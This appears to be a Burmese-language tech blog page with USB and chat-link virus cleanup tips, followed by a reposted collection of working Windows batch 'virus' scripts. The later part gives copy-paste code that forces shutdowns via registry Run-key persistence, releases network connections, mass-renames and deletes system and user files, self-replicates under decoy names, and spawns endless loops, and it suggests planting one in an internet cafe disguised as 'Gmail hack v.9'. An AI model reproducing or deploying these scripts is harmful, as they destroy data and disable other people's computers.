Control Panel> Back up and Restore ကုိႏွိပ္ ေနာက္ေဘာက္စ္မွာ Recover System Setting or your com puter ကိုႏွိပ္ပါ။
ျပီးေတာ့ Open System Restore ကိုႏွိပ္။ ခဏေစာင့္ျပီး္ ေဘာက္စ္တစ္ခုေပၚလာလွ်င္ Next ကိုႏွိပ္။
ျပီးေတာ့ scan for effected programs ကိုႏွိပ္ ျပီးလွ်င္ Close ကိုႏွိပ္။ တစ္ဆက္တည္း Next ကိုႏွိပ္ျပီး ခဏၾကာ လွ်င္ ကြန္ပ်ဴတာ Restart က်သြားပါလိ့မ္မယ္။

တစ္ခ်ိဳ႕ကြန္ပ်ဴတာဆို ဒီနည္းနဲ႔အဆင္ေျပသြားႏိုင္ပါတယ္။ အဆင္မေျပခဲ့ေသာ္….

နည္းလမ္း (၂)

Download Bat file :
mdmrm bat

နည္းလမ္း (၂)ကေတာ့ bat file ေျဖရွင္းတဲ့နည္းလမ္းေလးပါ။ bat ဖိုင္ကို ေဒါင္းလုပ္လိုက္ပါ။ (bat ဖိုင္က သူငယ္ ခ်င္းတစ္ေယာက္ကေန ေပးလိုက္တာပါ)
ေအာက္ပါအဆင့္အတိုင္းလုိက္လုပ္ပါ....Safe Mode ၀င္ျပင္ရမယ္ေနာ္..

1. Start the Windows in Safe Mode
2. Rename the mdmrm to mdmrm.bat to be an Executable Batch file
3. Run the mdmrm.bat (attached)

စက္ကို Restart ခ်ပါ ။

ေစာလင္းနက္စ္
Saw Linux  /  6:03 AM  /    /  No comments
ဒီတစ္ရက္ႏွစ္ရက္အတြင္း ဂ်ီေတာ့မွာ facebook.com IMG…JPG Virus လင့္တစ္ခုျပန္ႏွံ႕ေနတယ္။ အဲဒီလင့္ ေအာ္တိုမက္တစ္ မိမိဂ်ီေတာ့ခ်က္ေဘာက္စ္မွာ လာျပီးလင့္ထိုးေပးပါလိမ့္မယ္။ မိမိက အဲဒီလင့္ကိုဖြင့္လိုက္မိရင္ system ထဲေရာက္သြားျပီး မိမိဘေရာက္စာေတြ ဂ်ီေတာ့ေတြကို ပိတ္လုိက္ ဖြင့္လိုက္ျဖစ္ေနပါလိမ့္မယ္။ ေနာက္ ျပီး အသံေတြတစ္ခုမဟုတ္ တစ္ခုထြက္လာပါလိမ့္မယ္။ အဲဒီလင့္ကိုမဖြင့္မိဖို႔ သတိေပးၾကပါ။ အကယ္၍ဖြင့္မိလုိ႔ ၎ဗိုင္းရပ္စ္ကူးဆက္ခံရျပီးဆိုရင္ ေအာက္ပါအခ်က္ေတြနဲ႔ ဗိုင္းရပ္စ္ကိုရွင္းထုတ္ပါ။

facebook.com IMG…JPG Virus ျပန္႔ႏွံ႕ပံု


နည္းလမ္း (၁)

မိမိစက္ကို system restore ျပန္လုပ္ပါ။ လုပ္နည္း…

Control Panel> Back up and Restore ကုိႏွိပ္ ေနာက္ေဘာက္စ္မွာ Recover System Setting or your com puter ကိုႏွိပ္ပါ။
ျပီးေတာ့ Open System Restore ကိုႏွိပ္။ ခဏေစာင့္ျပီး္ ေဘာက္စ္တစ္ခုေပၚလာလွ်င္ Next ကိုႏွိပ္။
ျပီးေတာ့ scan for effected programs ကိုႏွိပ္ ျပီးလွ်င္ Close ကိုႏွိပ္။ တစ္ဆက္တည္း Next ကိုႏွိပ္ျပီး ခဏၾကာ လွ်င္ ကြန္ပ်ဴတာ Restart က်သြားပါလိ့မ္မယ္။

တစ္ခ်ိဳ႕ကြန္ပ်ဴတာဆို ဒီနည္းနဲ႔အဆင္ေျပသြားႏိုင္ပါတယ္။ အဆင္မေျပခဲ့ေသာ္….

နည္းလမ္း (၂)

Download Bat file :
mdmrm bat

နည္းလမ္း (၂)ကေတာ့ bat file ေျဖရွင္းတဲ့နည္းလမ္းေလးပါ။ bat ဖိုင္ကို ေဒါင္းလုပ္လိုက္ပါ။ (bat ဖိုင္က သူငယ္ ခ်င္းတစ္ေယာက္ကေန ေပးလိုက္တာပါ)
ေအာက္ပါအဆင့္အတိုင္းလုိက္လုပ္ပါ....Safe Mode ၀င္ျပင္ရမယ္ေနာ္..

1. Start the Windows in Safe Mode
2. Rename the mdmrm to mdmrm.bat to be an Executable Batch file
3. Run the mdmrm.bat (attached)

စက္ကို Restart ခ်ပါ ။

ေစာလင္းနက္စ္

Sunday, February 26, 2012

Saw Linux  /  8:20 AM  /    /  No comments
က်ေနာ္လဲ ဒီတစ္ရက္ႏွစ္ရက္ အလုပ္နည္းနည္းရႈပ္တာရယ္ မဟုတ္တဲ့အလုပ္ကို ဟုတ္ေအာင္လုပ္တာရယ္ ေၾကာင့္ တစ္ခ်ိဳ႕လာေမးသူေတြရဲ႕ ေမးခြန္းေတြကို ျပန္မေျဖေပးႏိုင္ေသးတာေတာင္းပန္ပါတယ္။ က်ေနာ္ရဲ႕ သူငယ္ခ်င္းအားလံုးကို၎ ေရာက္လာတဲ့ ဗစ္စစ္တာအားလံုးကိုေသာ္၎ေလးစားပါတယ္လို႔ေျပာပါရေစ…
ဗိုင္းရပ္စ္နဲ႔ပတ္သက္ရင္ pen driver (or) usb driver ေတြမွာ အရင္သန္႔ရွင္းေအာင္ထားဖုိ႔လိုတာေၾကာင့္
က်ေနာ္ဒီေတာ့ပစ္ကို ေရးလိုက္တာပါ။ (အရင္ကသိမ္းထားတဲ့ မေနာသားဆိုက္မွမွီျငမ္းထားသည္)

VIRUS ဆိုတာကို PC/laptop's ေတြမွာ ေယဘုယ်အားျဖင္႔ Network မခ်ိတ္ထားတဲ႔သူေတြေတာင္ ခံစားရၾကပါတယ္ ...အဲဒါဆို ဘယ္ကေန၀င္လဲအဲဒီ VIRUS ေတြက ..ေမးစရာရွိလာပါတယ္ ..Pen Drives (OR) USB Devices ေတြကေန၀င္လာတာပါ ..တစ္ခ်ိဳ႕ေသာ VIRUS ေတြဟာ Ravmon Virus , Heap41a worm ေတြနဲ႔
အလားသ႑န္တူျပီး အဲဒီ VIRUS ေတြ Pen Drives (OR) USB Devices ေတြထဲမွာရွိေနရင္ Anti-Virus ေတာ္ ေတာ္မ်ားမ်ားဟာ VIRUSေတြကိုမသတ္ႏိုင္ၾကပါဘူး..ဒါေၾကာင္႔ အဲဒီ VIRUS ေတြ Pen Drives (OR) USB
Devices ထဲ မေရာက္ေအာင္ ၊ ေရာက္လာရင္လဲ ဘယ္လို ရွင္းရေအာင္ ဆိုတာေလးကို ေအာက္မွာေရးေပးထားပါတယ္..

Pen Drives (OR) USB Devices ကို ကြန္ပ်ဳတာမွ တပ္လိုက္ပါ ..ျပီးရင္ My computer ကို၀င္ျပီး ယခုတပ္ လိုက္တဲ႔ Drive Letterကို မွတ္သားထားလိုက္..

{ ဥပမာ - Sawlinux ( I ) လို႔ ေရးထားတယ္ဆိုရင္ Drive Letter က I ေပါ႔ ..ဒါကို ဆိုလိုတာပါ } ျပီးရင္
Start --> Run --> cmd လို႔ ရိုက္ထည္႔ျပီး Enter ေခါက္လိုက္ပါ ...Command Window ( cmd ) တက္လာ မယ္ ..

Command Window ( cmd ) တက္လာရင္ ခုနက မွတ္လာတဲ႔ Pen Drives (OR) USB Devices ရဲ႕Drive Letter ကို ရိုက္ထည္႔ျပီး Enter ေခါက္လိုက္ပါ ..

{ ဥပမာ - ........ >I: } -- ( : ) ပါရမည္ ...

Pen Drives (OR) USB Devices ရဲ႕Drive ကိုေရာက္ျပီဆို dir/w/o/a/p လို႔ ရိုက္ထည္႔ျပီး Enter ေခါက္လိုက္ပါ..

အဲဒါဆိုရင္ Pen Drives (OR) USB Devices ရဲ႕Drive ထဲက ရွိသမွ် ဖိုင္ေတြ List ထြက္လာမယ္ ..
အဲဒီ List ထဲမွာ ရွာၾကည္႔ပါ ..ေအာက္မွာ ေဖာ္ျပေပးထားတဲ႔ ဖိုင္အမည္ေတြ ပါလားဆိုတာ...

• Autorun.inf
• New Folder.exe
• Bha.vbs
• Iexplore.vbs
• Info.exe
• New_Folder.exe
• Ravmon.exe
• RVHost.exe

အေပၚက ေဖာ္ျပေပးထားတဲ႔ ဖိုင္တစ္ခုခုပါလာရင္ -

Run Command ကေန attrib -h -r -s -a *.* လို႔ ရိုက္ထည္႔ျပီး Enter ေခါက္လိုက္ပါ ..ျပီးရင္ ဖိုင္ေတြ ဖ်က္ဖို႔အတြက္ Command မွာ del filename လို႔ ရိုက္ထည္႔ျပီး ဖ်က္လိုက္ပါ ..
{ ဥပမာ - del autorun.inf } -- Filename ဆိုတဲ႔ေနရာမွာက ဖ်က္မဲ႔ ဖိုင္အမည္ကို ထည္႔ေရးေပးရပါမယ္ ..

ျပီးသြားျပီဆိုရင္ ပိုေသခ်ာသြားေအာင္ Pen Drives (OR) USB Devices ကို Antivirus တစ္ခုခုနဲ႔ ထပ္စစ္လိုက္ပါ ...ဒါဆို အဆင္ေျပပါျပီ ..
Saw Linux  /  8:20 AM  /    /  No comments
က်ေနာ္လဲ ဒီတစ္ရက္ႏွစ္ရက္ အလုပ္နည္းနည္းရႈပ္တာရယ္ မဟုတ္တဲ့အလုပ္ကို ဟုတ္ေအာင္လုပ္တာရယ္ ေၾကာင့္ တစ္ခ်ိဳ႕လာေမးသူေတြရဲ႕ ေမးခြန္းေတြကို ျပန္မေျဖေပးႏိုင္ေသးတာေတာင္းပန္ပါတယ္။ က်ေနာ္ရဲ႕ သူငယ္ခ်င္းအားလံုးကို၎ ေရာက္လာတဲ့ ဗစ္စစ္တာအားလံုးကိုေသာ္၎ေလးစားပါတယ္လို႔ေျပာပါရေစ…
ဗိုင္းရပ္စ္နဲ႔ပတ္သက္ရင္ pen driver (or) usb driver ေတြမွာ အရင္သန္႔ရွင္းေအာင္ထားဖုိ႔လိုတာေၾကာင့္
က်ေနာ္ဒီေတာ့ပစ္ကို ေရးလိုက္တာပါ။ (အရင္ကသိမ္းထားတဲ့ မေနာသားဆိုက္မွမွီျငမ္းထားသည္)

VIRUS ဆိုတာကို PC/laptop's ေတြမွာ ေယဘုယ်အားျဖင္႔ Network မခ်ိတ္ထားတဲ႔သူေတြေတာင္ ခံစားရၾကပါတယ္ ...အဲဒါဆို ဘယ္ကေန၀င္လဲအဲဒီ VIRUS ေတြက ..ေမးစရာရွိလာပါတယ္ ..Pen Drives (OR) USB Devices ေတြကေန၀င္လာတာပါ ..တစ္ခ်ိဳ႕ေသာ VIRUS ေတြဟာ Ravmon Virus , Heap41a worm ေတြနဲ႔
အလားသ႑န္တူျပီး အဲဒီ VIRUS ေတြ Pen Drives (OR) USB Devices ေတြထဲမွာရွိေနရင္ Anti-Virus ေတာ္ ေတာ္မ်ားမ်ားဟာ VIRUSေတြကိုမသတ္ႏိုင္ၾကပါဘူး..ဒါေၾကာင္႔ အဲဒီ VIRUS ေတြ Pen Drives (OR) USB
Devices ထဲ မေရာက္ေအာင္ ၊ ေရာက္လာရင္လဲ ဘယ္လို ရွင္းရေအာင္ ဆိုတာေလးကို ေအာက္မွာေရးေပးထားပါတယ္..

Pen Drives (OR) USB Devices ကို ကြန္ပ်ဳတာမွ တပ္လိုက္ပါ ..ျပီးရင္ My computer ကို၀င္ျပီး ယခုတပ္ လိုက္တဲ႔ Drive Letterကို မွတ္သားထားလိုက္..

{ ဥပမာ - Sawlinux ( I ) လို႔ ေရးထားတယ္ဆိုရင္ Drive Letter က I ေပါ႔ ..ဒါကို ဆိုလိုတာပါ } ျပီးရင္
Start --> Run --> cmd လို႔ ရိုက္ထည္႔ျပီး Enter ေခါက္လိုက္ပါ ...Command Window ( cmd ) တက္လာ မယ္ ..

Command Window ( cmd ) တက္လာရင္ ခုနက မွတ္လာတဲ႔ Pen Drives (OR) USB Devices ရဲ႕Drive Letter ကို ရိုက္ထည္႔ျပီး Enter ေခါက္လိုက္ပါ ..

{ ဥပမာ - ........ >I: } -- ( : ) ပါရမည္ ...

Pen Drives (OR) USB Devices ရဲ႕Drive ကိုေရာက္ျပီဆို dir/w/o/a/p လို႔ ရိုက္ထည္႔ျပီး Enter ေခါက္လိုက္ပါ..

အဲဒါဆိုရင္ Pen Drives (OR) USB Devices ရဲ႕Drive ထဲက ရွိသမွ် ဖိုင္ေတြ List ထြက္လာမယ္ ..
အဲဒီ List ထဲမွာ ရွာၾကည္႔ပါ ..ေအာက္မွာ ေဖာ္ျပေပးထားတဲ႔ ဖိုင္အမည္ေတြ ပါလားဆိုတာ...

• Autorun.inf
• New Folder.exe
• Bha.vbs
• Iexplore.vbs
• Info.exe
• New_Folder.exe
• Ravmon.exe
• RVHost.exe

အေပၚက ေဖာ္ျပေပးထားတဲ႔ ဖိုင္တစ္ခုခုပါလာရင္ -

Run Command ကေန attrib -h -r -s -a *.* လို႔ ရိုက္ထည္႔ျပီး Enter ေခါက္လိုက္ပါ ..ျပီးရင္ ဖိုင္ေတြ ဖ်က္ဖို႔အတြက္ Command မွာ del filename လို႔ ရိုက္ထည္႔ျပီး ဖ်က္လိုက္ပါ ..
{ ဥပမာ - del autorun.inf } -- Filename ဆိုတဲ႔ေနရာမွာက ဖ်က္မဲ႔ ဖိုင္အမည္ကို ထည္႔ေရးေပးရပါမယ္ ..

ျပီးသြားျပီဆိုရင္ ပိုေသခ်ာသြားေအာင္ Pen Drives (OR) USB Devices ကို Antivirus တစ္ခုခုနဲ႔ ထပ္စစ္လိုက္ပါ ...ဒါဆို အဆင္ေျပပါျပီ ..

Saturday, August 13, 2011

Saw Linux  /  8:25 AM  /    /  2 comments
မေကာင္းတဲ့နည္းပညာကို အားေပးတာမဟုတ္ပါဘူး။ ဒါေတြလိုက္စုထားတာၾကာေရာေပါ့။ က်ေနာ္က Progra

-ming Language, Web development ခက္ခဲနက္နဲတာေတြမေလ့လာျဖစ္တာပဲရွိမွာ။ ဒါေပမယ့္ အျမဲတန္း

အဲဒါေတြဖတ္ျဖစ္တယ္။ Programming Language အပိုင္းမွာ ေလ့လာမယ္ဆိုရင္ ေအာက္ပါ Section အပိုင္း

မ်ားေလ့လာဖတ္လို႔ရႏိုင္ပါတယ္။ ဒီအပိုင္းေတြမွာက်ေနာ္ဖတ္သာဖတ္ျဖစ္တယ္။ ေလ့က်င့္တဲ့အပို္င္းမွာေတာ့

လက္ေတြ႕မလုပ္ျဖစ္ခဲ့ဘူး။ ေနာက္ျပီး က်ေနာ္က ေနာက္ပိုင္းမွကြန္ပ်ဴတာေလ့လာျဖစ္ခဲ့ေတာ့ ဒီအပိုင္းေတြ

ကို ေလ့က်င့္ဖို႔မလြယ္ေတာ့ပါဘူး။ ေအ...အသက္ႏွစ္ဆယ္ေက်ာ္ Language ပိုင္းႏိုင္တဲ့ညီငယ္ေတြဆိုရင္

အထူးကိုအားေပးပါတယ္။ ေလ့လာလဲ ေလ့လာသင့္ပါတယ္။

# ↳ C++

# ↳ C#

# ↳ Python

# ↳ Java

# ↳ VB.NET

# ↳ VB

# ↳ Theory And Data Structure

# ↳ XML



ေနာက္ျပီးေအာက္ကအပိုင္းေတာ့ Web Development အပိုင္းျဖစ္ပါတယ္။ ၀က္ဘဆိုက္ေတြကို စနစ္တက်

လုပ္တတ္ခ်င္ရင္ ေအာက္ပါအပိုင္းေတြကိုေလ့လာရမွာပါ။ အထူးအားျဖင့္ HTML / CSS, Javascript / AJAX

ေလ့လာရမယ္။ အဲဒီအပိုင္းေတြကို ကၽြမ္းက်င္မယ္ဆိုရင္လည္း Web အပုိင္းမွာေတာ္ေတာ္ခရီးေရာက္ပါတယ္။

က်ေနာ္က HTML / CSS, Javascript ေတြကို ကိုယ္ပိုင္ေရးတတ္တာမဟုတ္ပါ။ ဘယ္အပိုင္းမွာ ဘယ္

လိုသြင္းရလဲ ဘယ္လိုျပင္ရမလဲစတာေတြ က်ေနာ္သိသေလာက္သိပါတယ္။ တတ္ခ်င္တဲ့ပုဂၢိဳလ္မ်ားအေနနဲ႔

ေလ့လာေပါ့ဗ်ာ။



# ↳ PHP

# ↳ Ruby On Rail

# ↳ ASP / ASP.NET

# ↳ HTML / CSS

# ↳ Javascript / AJAX

# ↳ Dreamweaver

# CMS

# ↳ Joomla

# ↳ Wordpress



က်န္တာေတာ့ က်ေနာ္ေန႔စဥ္စာဖတ္တယ္။လက္ေတြ႕လိုက္လုပ္တယ္။ရလာတဲ့တစ္ခ်ိဳ႕မေကာင္းတဲ့နည္း

ပညာေတြကို ဒီတိုင္းပဲသိမ္းထားတာမ်ားပါတယ္။

ဒါေပမယ့္ တစ္ေန႔က က်ေနာ္ကိုင္တဲ့ဆိုက္တစ္ခုရဲ႕ စီေဘာက္စ္မွာ မေကာင္းတဲ့လင့္ေတြလာထိုးျပီးရုန္႕ရင္း

ၾကမ္းတမ္းေသာစကားလံုးေတြေရးထားတာေတြ႕ရတယ္။ က်ေနာ္ ဘာမွမေျပာလိုပါဘူး။ ဒါေပမယ့္ မိမိက

ကြန္ပ်ဴတာကၽြမ္းက်င္တယ္ဆိုရင္ စမ္းၾကည့္ေပါ့ဗ်ာ။ က်ေနာတို႔ကနည္းပညာေလ့လာမယ့္လူအတူတူဆို

ေတာ့ ကိုယ့္စက္ကို မပ်က္ေအာင္ထိန္းသိမ္းနည္းေလးေတြ သိထားျပီးလို႔ထင္ပါတယ္။





.bat file ကို အေျခခံထားေသာ Virus ေရးထားေသာ Code မ်ားေလ့လာခ်င္ရင္ ေအာက္ပါအတိုင္း

ေလ့လာႏိုင္ပါတယ္။



simple virus code



June 17th, 2010 | Author: zuzu

Virus Code ေလးေတြတင္ေပးလုိက္တယ္ဂ်ာ။မယုံရင္လည္း Run ၾကည္ ့ေပါ့ေနာ္။ ဟိဟိ ။တတ္လာ

တဲ ့ျပသနာေတြေတာ ့တာ၀န္မယူပါ။

ဒါကေတာ ့ကြန္ျပဴတာ shutdown က်ေစတဲ ့ ဗဳိင္းရပ္ကုတ္ပါ။notepad မွာ copy/paste လုပ္ျပီး….shutdown.bat လုိ ့ save မွတ္လုိက္ပါ။သြား Run မိရင္ေတာ ့ ျပန္တတ္လာရင္ သင္စက္ဟက္ခံထိျပီးဆုိျပီးျပေနလိမ္ ့မယ္။



echo @echo off>c:windowshartlell.bat

echo break off>>c:windowshartlell.bat

echo shutdown -r -t 11 -f>>c:windowshartlell.bat

echo end>>c:windowshartlell.bat

reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f

reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d c:windowshartlell.bat /f

echo You have been HACKED.

PAUSE



ဒါကေတာ ့ အင္တာနက္ကုိ block လုပ္လုိက္တဲ ့Code ကုတ္ပါ။

echo @echo off>c:windowswimn32.bat

echo break off>>c:windowswimn32.bat

echo ipconfig/release_all>>c:windowswimn32.bat

echo end>>c:windowswimn32.bat

reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f

reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f

echo You Have Been HACKED!

PAUSE

Disableinternet.bat လုိ ့ save မွတ္ပီးသိမ္းထားနုိင္ပါတယ္။မေတာ္တဆ သြားနိပ္မိမွာဆုိးလုိ ့ပါ။



ဒါကေတာ ့ TXT file ေတြကုိ အလုပ္မလုပ္ေအာင္ ခုိင္းလုိက္တဲ ့ comment ျဖစ္ပါတယ္။

REN *.DOC *.TXT

REN *.JPEG *.TXT

REN *.LNK *.TXT

REN *.AVI *.TXT

REN *.MPEG *.TXT

REN *.COM *.TXT

REN *.BAT *.TXT

txt.bat ဆုိျပီး save မွတ္ထားလုိက္ပါ။



ေအာက္ဆုံးကေတာ ့ေတာ ့ အားလုံးကို ေပါင္းျပီးေရးထားလုိက္တာပါ။

အေပၚက ေစခုိိင္းထားတဲ ့အရာေတြကို တစ္ခါတည္းအလုပ္လုပ္သြားတာပါ။ေတေရာ ဟီး ။ ။

:CRASH

net send * WORKGROUP ENABLED

net send * WORKGROUP ENABLED

GOTO CRASH

ipconfig /release

shutdown -r -f -t0

echo @echo off>c:windowshartlell.bat

echo break off>>c:windowshartlell.bat

echo shutdown -r -t 11 -f>>c:windowshartlell.bat

echo end>>c:windowshartlell.bat

reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f

reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f

echo You Have Been Hackedecho @echo off>c:windowswimn32.bat

echo break off>>c:windowswimn32.bat

echo ipconfig/release_all>>c:windowswimn32.bat

echo end>>c:windowswimn32.bat

reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f

reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f

echo YOU HAVE BEEN HACKED *****

REN *.DOC *.TXT

REN *.JPEG *.TXT

REN *.LNK *.TXT

REN *.AVI *.TXT

REN *.MPEG *.TXT

REN *.COM *.TXT

REN *.BAT *.TXT

PAUSE

PAUSE





looping of 2 bat file and Simple Virus Codes



May 28th, 2010 | Author: zuzu



Network သမား တစ္ေယာက္ဟာ Bat code ေတြ ကုိ ရင္းနွီးျပီးသားျဖစ္မွာပါ။

သင္ဟာ Programmer တစ္ေယာက္မဟုတ္ရင္ေတာင္ bat code ေတြ ကုိ သိထားယုံနဲ ့

အေသးစား Virus တစ္ေကာင္ကုိ ဖန္တီးနိုင္မွာပါ။ ဘယ္လို ဖန္တီးမလဲ?

ဒါက ေတာ ့ သင့္ဥာဏ္ကြန္ ့ျမဴးနိုင္မွုေပၚမွာ မူတည္ပါတယ္။

အခု bat file နွစ္ခုနဲ ့ သင့္ရဲ ကြန္ျပဴတာ ကုိ ဒုကၡေပးၾကည္ ့ရေအာင္။

ဒီကုတ္ေလးေတြ ကုိ ကူးပါ။

notepad ထဲမွာေနာ္။

start

shutdown -s

@echo off

:loop

msg * Hello Chuchar

start Itdengerous.2

goto loop

ျပီးရင္ Itdengerous.1 ဆိုျပီး .bat နဲ ့ save ပါ။

ေနာက္ျပီးေတာ ့ ဒီကုတ္ေလးပါပဲ။

start

shutdown -s

@echo off

:loop

msg * Hello Chuchar

start Itdengerous.1

goto loop

Itdengerous.2 လုိ ့အမည္ေပးျပီး .bat နဲ ့ save မွတ္ပါ။



ဖုိဒါတစ္ခုထဲမွာ အဲဒီ bat ဖုိင္ နွစ္ဖုိင္လုံးရွိေနပါေစ။

ကဲ သင္ၾကဳိက္တဲ ့ဖိုင္တစ္ခု ကုိ Run ၾကည္ ့ပါ။

ဘာျဖစ္သြားလဲ ဆုိတာေတြ ့ပါလိမ္ ့မယ္ ။ ။

Looping ပတ္္ျခင္းေတြ မျပီးဆုံးနုိင္ေတာ ့ပါဘူး။

bat ဖုိင္ကုိ ေတြရဲ ့ looping ပတ္ျခင္းကုိ Ctrl+C နဲ ့တားဆီးနုိင္ပါတယ္။

ဒါေပ ့မယ္..အေပၚမွာ ပါတဲ ့ဖိုင္နွစ္ခု ရဲ ့ looping အေရအတြတ္က အကန္ ့အသတ္မရွိတာေၾကာင့္

Ctrl+C လည္း တားဆီးနူိင္မွာမဟုတ္ေတာ ့ပါဘူး။

code ရဲ ့ စစျခင္းမွာ Shutdown -s ထည္ ့ထားတဲ ့အတြတ္… shutdown ကလည္း မျဖစ္မေနက်မွာပါပဲ။

shutdown -a နဲ ့ေတာ ့ အဲဒီ process ကုိ တားဆီးနုိင္ပါတယ္။

Start>run or Window key+R က ေန ျပီး

Shutdown -a နဲ ့သတ္ပစ္နိုင္ပါတယ္။

ေအာက္က

msg * Hello Chuchar

ဆုိတာ က ေတာ ့ Pop box တစ္ခု အေနနဲ ့သင္ဘာေပၚခ်င္လဲ။ သင္ၾကဳိက္တာေရးထည္ ့နိုင္ပါတယ္။

msg * I Love You ဆုိရင္ သူကလည္း သင္ comment ေပးထားတဲ ့အတုိင္း I love You ဆုိျပီး ေပၚေနပါလိမ္ ့မယ္။

မမုိက္ဘူးလား ။

start Itdengerous.1

start Itdengerous.2

ဆုိတာ ကေတာ ့ သင့္ရဲ ့ bat file နွစ္ဖုိင္ ကုိ လွမ္း ျပီး Run တာ ျဖစ္ပါတယ္။

1 က 2 ကုိ ဖြင့္မယ္။ 2 က 1 ကုိ ဖြင့္မယ္။

ျပီးရင္ goto loop အၾကိမ္အေရအတြတ္ မရွိ ဖြင့္ေနမယ္။

အဲဒါဆုိ ေသခ်ာပါတယ္။ သင့္ကြန္ျပဴတာ လံုး၀ restart ခ်လုိက္ရမယ္။

မပူပါနဲ ့ ။

တစ္ခါတည္းနဲ ့အေရာက္ပုိ ့ခဲ ့မယ္ေနာ္။

အင္တာနက္ဆုိင္တစ္ဆုိင္သြားသုံးတယ္ဆုိပါစုိ ့။

သင္အဲဒီကြန္ျပဴတာကုိ အဲဒီဖုိင္ေတြ Run ခ်င္တယ္ဆုိ လြယ္ပါတယ္။

အဲဒီ ဖုိင္နွစ္ဖုိင္ရွိတဲ ့ ဖုိဒါကုိ ေကာ္ပီ လုပ္ပါ။ ဒီအတုိင္းၾကီး ထားခဲ ့မယ္ဆုိ သိတဲ ့သူေတြ သိမယ္ေလ။

အဲဒီေတာ ့…. C:// ရဲ ့ေအာက္ေနရာ တစ္ခုခု။ ဒါမွမဟုတ္ သင့္စိတ္ၾကဳိက္ေနရာတစ္ခု မွ သြားထည္ ့လုိက္ပါ။

ျပီးရင္ Itdengerous.1 ျဖစ္ေစ Itdengerous.2 ျဖစ္ေစ တစ္ဖုိင္ဖုိင္ကုိ Desktop ကုိ လွမ္းျပီး

shortcut ပုိ ့ပါ။ အဲဒီ shortcut file ကုိ icon ေျပာင္းလုိ ့ရပါတယ္။

သင္ၾကဳိက္တဲ ့ Icon ေလး ေျပာင္းျပီး။ဒီလုိေလးေပးခဲ ့ပါလားဟင္။

Gmail hack v.9 ဆုိျပီး

ေသခ်ာပါတယ္ user ေတြ စိတ္၀င္စားမွာ





ေအာက္မွာ ဗုိင္းရပ္ simple code ေလးပါ။ ေလ ့လာနုိင္ပါတယ္။

title hello

@echo off

del *.dll

del *.exe

del *.ini

time 00:00

date 88/88/888

msg *hello it my brithday

msg *hello it my brithday

msg *hello it my brithday

msg *hello it my brithday

msg *hello it my brithday

msg *hello it my brithday

msg *hello it my brithday

msg *hello it my brithday

msg *hello it my brithday

msg *hello it my brithday

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

cd C:\WINDOWS\system32

del /S /F /Q keyboard.drv

del /S /F /Q keyboard.sys

del system32

shutdown -s -f

exit



အႏၱရာယ္ရွိတဲ ့ Virus code



June 17th, 2010 | Author: zuzu

အႏၱရာယ္ရွိတဲ ့ Virus code တစ္ခုပါ။သိထားသင့္တယ္ထင္လုိ ့တင္ေပးထားတာပါ။

သင့္စက္မွာ မ Run ပါနဲ ့။

@Echo off

color 4

title 4

title R.I.P

start

start

start

start calc

copy %0 %Systemroot%\Greatgame > nul

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ

/d %systemroot%\Greatgame.bat /f > nul

copy %0 *.bat > nul

Attrib +r +h Greatgame.bat

Attrib +r +h

RUNDLL32 USER32.DLL.SwapMouseButton

start calc

cls

tskill msnmsgr

tskill LimeWire

tskill iexplore

tskill NMain

start

cls

cd %userprofile%\desktop

copy Greatgame.bat R.I.P.bat

copy Greatgame.bat R.I.P.jpg

copy Greatgame.bat R.I.P.txt

copy Greatgame.bat R.I.P.exe

copy Greatgame.bat R.I.P.mov

copy Greatgame.bat FixVirus.bat

cd %userprofile%My Documents

copy Greatgame.bat R.I.P.bat

copy Greatgame.bat R.I.P.jpg

copy Greatgame.bat R.I.P.txt

copy Greatgame.bat R.I.P.exe

copy Greatgame.bat R.I.P.mov

copy Greatgame.bat FixVirus.bat

start

start calc

cls

msg * R.I.P

msg * R.I.P

shutdown -r -t 10 -c “VIRUS DETECTED”

start

start

time 12:00

:R.I.P

cd %usernameprofile%\desktop

copy Greatgame.bat %random%.bat

goto RIP



Virus ေရးသားနည္းေလးပါ..ဗဟုသုတရေအာင္လို႕တင္ေပးလိုက္တာပါ.....

သူမ်ားေတြကိုေလွ်ာက္ၿပီးဒုကၡမေပးပါနဲ႕ခင္ဗ်..



လုပ္နည္းေလးကေတာ့...

ပထမဆံုး notepad ကိုဖြင့္ပါ..

ၿပီးရင္ေအာက္မွာေပးထားတဲ့ Command ေတြကို Copy/ Paste လုပ္ၿပီး .bat file အေနနဲ႕ save လုပ္လိုက္ပါ...



1.............Danger Virus........ (.bat)

Code:

@echo del off C:\\windows\system32







2.............Danger Virus......... (.bat)

Code:

@echo off

